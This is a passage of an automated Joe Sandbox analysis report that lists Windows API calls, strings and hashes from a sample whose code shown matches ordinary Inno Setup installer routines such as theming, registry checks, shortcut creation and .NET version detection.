                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6D7
                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6E9
                                                                  • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B6FB
                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B70D
                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B71F
                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B731
                                                                  • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B743
                                                                  • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B755
                                                                  • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B767
                                                                  • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B779
                                                                  • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B78B
                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B79D
                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7AF
                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0044B7C1
                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0044B7D3
                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0044B7E5
                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0044B7F7
                                                                  • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0044B809
                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0044B81B
                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0044B82D
                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0044B83F
                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0044B851
                                                                  • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0044B863
                                                                  • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0044B875
                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0044B887
                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0044B899
                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0044B8AB
                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0044B8BD
                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0044B8CF
                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0044B8E1
                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0044B8F3
                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0044B905
                                                                  • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0044B917
                                                                  • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0044B929
                                                                  • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0044B93B
                                                                  • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0044B94D
                                                                  • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0044B95F
                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0044B971
                                                                  • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0044B983
                                                                  • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0044B995
                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0044B9A7
                                                                  • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0044B9B9
                                                                  • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0044B9CB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$LibraryLoadVersion
                                                                  • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                                  • API String ID: 1968650500-2910565190
                                                                  • Opcode ID: 6c67b19e24951571b37bf4c203fa1685e3d140177509ee69aad76801aa2bc0fe
                                                                  • Instruction ID: 77cdb2a24b144e98dd8fe0af3c477b00202e10f27d636664339925e4e96e780e
                                                                  • Opcode Fuzzy Hash: 6c67b19e24951571b37bf4c203fa1685e3d140177509ee69aad76801aa2bc0fe
                                                                  • Instruction Fuzzy Hash: 679198F0A40B11EBEB00AFB5AD96A2A3BA8EB15714310067BB454DF295D778DC108FDD
                                                                  APIs
                                                                  • 73A1A570.USER32(00000000,?,0041A93C,?), ref: 0041CA38
                                                                  • 73A24C40.GDI32(?,00000000,?,0041A93C,?), ref: 0041CA44
                                                                  • 73A26180.GDI32(0041A93C,?,00000001,00000001,00000000,00000000,0041CC5A,?,?,00000000,?,0041A93C,?), ref: 0041CA68
                                                                  • 73A24C00.GDI32(?,0041A93C,?,00000000,0041CC5A,?,?,00000000,?,0041A93C,?), ref: 0041CA78
                                                                  • SelectObject.GDI32(0041CE34,00000000), ref: 0041CA93
                                                                  • FillRect.USER32(0041CE34,?,?), ref: 0041CACE
                                                                  • SetTextColor.GDI32(0041CE34,00000000), ref: 0041CAE3
                                                                  • SetBkColor.GDI32(0041CE34,00000000), ref: 0041CAFA
                                                                  • PatBlt.GDI32(0041CE34,00000000,00000000,0041A93C,?,00FF0062), ref: 0041CB10
                                                                  • 73A24C40.GDI32(?,00000000,0041CC13,?,0041CE34,00000000,?,0041A93C,?,00000000,0041CC5A,?,?,00000000,?,0041A93C), ref: 0041CB23
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0041CB54
                                                                  • 73A18830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,0041CC02,?,?,00000000,0041CC13,?,0041CE34,00000000,?,0041A93C), ref: 0041CB6C
                                                                  • 73A122A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC02,?,?,00000000,0041CC13,?,0041CE34,00000000,?), ref: 0041CB75
                                                                  • 73A18830.GDI32(0041CE34,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC02,?,?,00000000,0041CC13), ref: 0041CB84
                                                                  • 73A122A0.GDI32(0041CE34,0041CE34,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC02,?,?,00000000,0041CC13), ref: 0041CB8D
                                                                  • SetTextColor.GDI32(00000000,00000000), ref: 0041CBA6
                                                                  • SetBkColor.GDI32(00000000,00000000), ref: 0041CBBD
                                                                  • 73A24D40.GDI32(0041CE34,00000000,00000000,0041A93C,?,00000000,00000000,00000000,00CC0020,00000000,00000000,00000000,0041CC02,?,?,00000000), ref: 0041CBD9
                                                                  • SelectObject.GDI32(00000000,?), ref: 0041CBE6
                                                                  • DeleteDC.GDI32(00000000), ref: 0041CBFC
                                                                    • Part of subcall function 0041A050: GetSysColor.USER32(?), ref: 0041A05A
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Color$ObjectSelect$A122A18830Text$A26180A570DeleteFillRect
                                                                  • String ID:
                                                                  • API String ID: 1381628555-0
                                                                  • Opcode ID: dd52d12a6b024fa5c35df86d1f57249e44ceff71b775bbbb3271d9076c63cc1d
                                                                  • Instruction ID: 82b5d3b79294c4079cc38f46940f8a3e5246528c32e36f15c424f6ef30e38055
                                                                  • Opcode Fuzzy Hash: dd52d12a6b024fa5c35df86d1f57249e44ceff71b775bbbb3271d9076c63cc1d
                                                                  • Instruction Fuzzy Hash: 0061F071A44608AFDB10EBE5DC86FEFB7B8EB48704F10446AB504E7281D67CA9508B69
                                                                  APIs
                                                                  • ShowWindow.USER32(?,00000005,00000000,00497C74,?,?,00000000,?,00000000,00000000,?,0049802B,00000000,00498035,?,00000000), ref: 0049795F
                                                                  • CreateMutexA.KERNEL32(00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00497C74,?,?,00000000,?,00000000,00000000,?,0049802B,00000000), ref: 00497972
                                                                  • ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00497C74,?,?,00000000,?,00000000,00000000), ref: 00497982
                                                                  • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 004979A3
                                                                  • ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00497C74,?,?,00000000,?,00000000), ref: 004979B3
                                                                    • Part of subcall function 0042D444: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4D2,?,?,?,00000001,?,00456052,00000000,004560BA), ref: 0042D479
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: ShowWindow$CreateFileModuleMultipleMutexNameObjectsWait
                                                                  • String ID: .lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup
                                                                  • API String ID: 2000705611-3672972446
                                                                  • Opcode ID: 2045753806e23fd6e9fea4bee8d30805ced8101e67e5ade90995f0c82b8a892a
                                                                  • Instruction ID: f92775941c35c4987ffcee83f2591dcd2e8f64eb72217f5dcf8b9acaa4e0c6bb
                                                                  • Opcode Fuzzy Hash: 2045753806e23fd6e9fea4bee8d30805ced8101e67e5ade90995f0c82b8a892a
                                                                  • Instruction Fuzzy Hash: 3E91D7306182449FDF11EBA5C856BAE7BF4EB49308F5184B7F500A7392D67CAC05CB19
                                                                  APIs
                                                                  • GetLastError.KERNEL32(00000000,0045A7B4,?,?,?,?,?,00000006,?,00000000,00496D69,?,00000000,00496E0C), ref: 0045A666
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast
                                                                  • String ID: .chm$.chw$.fts$.gid$.hlp$.lnk$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
                                                                  • API String ID: 1452528299-3112430753
                                                                  • Opcode ID: 127c5c00bd7f07bd664bda2d415f16e76833b4e90778cf540cd654be4338eef0
                                                                  • Instruction ID: 580fd2345af5d8a11a71580b87de25b1444814d8228b9e74f7717922954df390
                                                                  • Opcode Fuzzy Hash: 127c5c00bd7f07bd664bda2d415f16e76833b4e90778cf540cd654be4338eef0
                                                                  • Instruction Fuzzy Hash: E07181307002445BCB01EB6988817AE7BB59F48319F50866BFC01EB383DB7CDE59879A
                                                                  APIs
                                                                  • GetVersion.KERNEL32 ref: 0045C9FA
                                                                  • GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0045CA1A
                                                                  • GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW), ref: 0045CA27
                                                                  • GetProcAddress.KERNEL32(00000000,SetNamedSecurityInfoW), ref: 0045CA34
                                                                  • GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 0045CA42
                                                                    • Part of subcall function 0045C8E8: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0045C987,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045C961
                                                                  • AllocateAndInitializeSid.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045CC35,?,?,00000000), ref: 0045CAFB
                                                                  • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045CC35,?,?,00000000), ref: 0045CB04
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$AllocateByteCharErrorHandleInitializeLastModuleMultiVersionWide
                                                                  • String ID: GetNamedSecurityInfoW$SetEntriesInAclW$SetNamedSecurityInfoW$W$advapi32.dll
                                                                  • API String ID: 59345061-4263478283
                                                                  • Opcode ID: d4e9dcddc66f996bc70a3a05105cdd7da188d764776208506d3c6d6334ff02cf
                                                                  • Instruction ID: 7cfcd68cf7d50f34506c8699d7ac6bd3cbd645d605ef7a14e0a5f99aee2185cc
                                                                  • Opcode Fuzzy Hash: d4e9dcddc66f996bc70a3a05105cdd7da188d764776208506d3c6d6334ff02cf
                                                                  • Instruction Fuzzy Hash: C25186B1D00308EFDB11DF99C885BAEBBB8EB4C311F14806AF915B7241C6799945CFA9
                                                                  APIs
                                                                  • CoCreateInstance.OLE32(00499A74,00000000,00000001,00499774,?,00000000,00456875), ref: 0045657A
                                                                  • CoCreateInstance.OLE32(00499764,00000000,00000001,00499774,?,00000000,00456875), ref: 004565A0
                                                                  • SysFreeString.OLEAUT32(?), ref: 0045672D
                                                                  Strings
                                                                  • IPropertyStore::Commit, xrefs: 0045677D
                                                                  • IPersistFile::Save, xrefs: 004567FC
                                                                  • IShellLink::QueryInterface(IID_IPropertyStore), xrefs: 0045668F
                                                                  • IPropertyStore::SetValue(PKEY_AppUserModel_ID), xrefs: 00456712
                                                                  • IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning), xrefs: 004566C3
                                                                  • CoCreateInstance, xrefs: 004565AB
                                                                  • IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall), xrefs: 00456764
                                                                  • IShellLink::QueryInterface(IID_IPersistFile), xrefs: 0045679E
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CreateInstance$FreeString
                                                                  • String ID: CoCreateInstance$IPersistFile::Save$IPropertyStore::Commit$IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall)$IPropertyStore::SetValue(PKEY_AppUserModel_ID)$IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning)$IShellLink::QueryInterface(IID_IPersistFile)$IShellLink::QueryInterface(IID_IPropertyStore)
                                                                  • API String ID: 308859552-3936712486
                                                                  • Opcode ID: d9c88e13b0211f2ae0e7d78f7e27283256602066dc9cc7621edf88d817652462
                                                                  • Instruction ID: c38ea0ca400292199a4bf55cc3a6d877564858b73cfd7edbf1df179bb9384e2e
                                                                  • Opcode Fuzzy Hash: d9c88e13b0211f2ae0e7d78f7e27283256602066dc9cc7621edf88d817652462
                                                                  • Instruction Fuzzy Hash: A5A12170A00145AFDB50DFA9C885B9E7BF8AF09306F55406AF804E7362DB38DD48CB69
                                                                  APIs
                                                                  • 73A24C40.GDI32(00000000,?,00000000,?), ref: 0041B3BB
                                                                  • 73A24C40.GDI32(00000000,00000000,?,00000000,?), ref: 0041B3C5
                                                                  • GetObjectA.GDI32(?,00000018,00000004), ref: 0041B3D7
                                                                  • 73A26180.GDI32(0000000B,?,00000001,00000001,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B3EE
                                                                  • 73A1A570.USER32(00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B3FA
                                                                  • 73A24C00.GDI32(00000000,0000000B,?,00000000,0041B453,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B427
                                                                  • 73A1A480.USER32(00000000,00000000,0041B45A,00000000,0041B453,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B44D
                                                                  • SelectObject.GDI32(00000000,?), ref: 0041B468
                                                                  • SelectObject.GDI32(?,00000000), ref: 0041B477
                                                                  • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4A3
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0041B4B1
                                                                  • SelectObject.GDI32(?,00000000), ref: 0041B4BF
                                                                  • DeleteDC.GDI32(00000000), ref: 0041B4C8
                                                                  • DeleteDC.GDI32(?), ref: 0041B4D1
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Object$Select$Delete$A26180A480A570Stretch
                                                                  • String ID:
                                                                  APIs
                                                                    • Part of subcall function 0042C7FC: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C820
                                                                  • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00472AE8
                                                                  • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 00472BEF
                                                                  • SHChangeNotify.SHELL32(00000002,00000001,00000000,00000000), ref: 00472C05
                                                                  • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 00472C2A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: ChangeNotify$FullNamePathPrivateProfileStringWrite
                                                                  • String ID: .lnk$.pif$.url$Desktop.ini$Filename: %s$target.lnk${group}\
                                                                  APIs
                                                                    • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                                  • RegQueryValueExA.ADVAPI32(0045A98A,00000000,00000000,?,00000000,?,00000000,00454AE1,?,0045A98A,00000003,00000000,00000000,00454B18), ref: 00454961
                                                                    • Part of subcall function 0042E8C0: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453247,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8DF
                                                                  • RegQueryValueExA.ADVAPI32(0045A98A,00000000,00000000,00000000,?,00000004,00000000,00454A2B,?,0045A98A,00000000,00000000,?,00000000,?,00000000), ref: 004549E5
                                                                  • RegQueryValueExA.ADVAPI32(0045A98A,00000000,00000000,00000000,?,00000004,00000000,00454A2B,?,0045A98A,00000000,00000000,?,00000000,?,00000000), ref: 00454A14
                                                                  Strings
                                                                  • RegOpenKeyEx, xrefs: 004548E4
                                                                  • , xrefs: 004548D2
                                                                  • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 0045487F
                                                                  • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004548B8
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: QueryValue$FormatMessageOpen
                                                                  • String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                  APIs
                                                                    • Part of subcall function 00459184: RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,004592C1,00000000,00459479,?,00000000,00000000,00000000), ref: 004591D1
                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00459479,?,00000000,00000000,00000000), ref: 0045931F
                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00459479,?,00000000,00000000,00000000), ref: 00459389
                                                                    • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00459479,?,00000000,00000000,00000000), ref: 004593F0
                                                                  Strings
                                                                  • SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 004593A3
                                                                  • .NET Framework not found, xrefs: 0045943D
                                                                  • v1.1.4322, xrefs: 004593E2
                                                                  • v4.0.30319, xrefs: 00459311
                                                                  • v2.0.50727, xrefs: 0045937B
                                                                  • .NET Framework version %s not found, xrefs: 00459429
                                                                  • SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 0045933C
                                                                  • SOFTWARE\Microsoft\.NETFramework\Policy\v4.0, xrefs: 004592D2
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Close$Open
                                                                  • String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$SOFTWARE\Microsoft\.NETFramework\Policy\v4.0$v1.1.4322$v2.0.50727$v4.0.30319
                                                                  APIs
                                                                  • CloseHandle.KERNEL32(?), ref: 0045889B
                                                                  • TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 004588B7
                                                                  • WaitForSingleObject.KERNEL32(?,00002710,?), ref: 004588C5
                                                                  • GetExitCodeProcess.KERNEL32(?), ref: 004588D6
                                                                  • CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 0045891D
                                                                  • Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458939
                                                                  Strings
                                                                  • Helper isn't responding; killing it., xrefs: 004588A7
                                                                  • Stopping 64-bit helper process. (PID: %u), xrefs: 0045888D
                                                                  • Helper process exited, but failed to get exit code., xrefs: 0045890F
                                                                  • Helper process exited., xrefs: 004588E5
                                                                  • Helper process exited with failure code: 0x%x, xrefs: 00458903
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
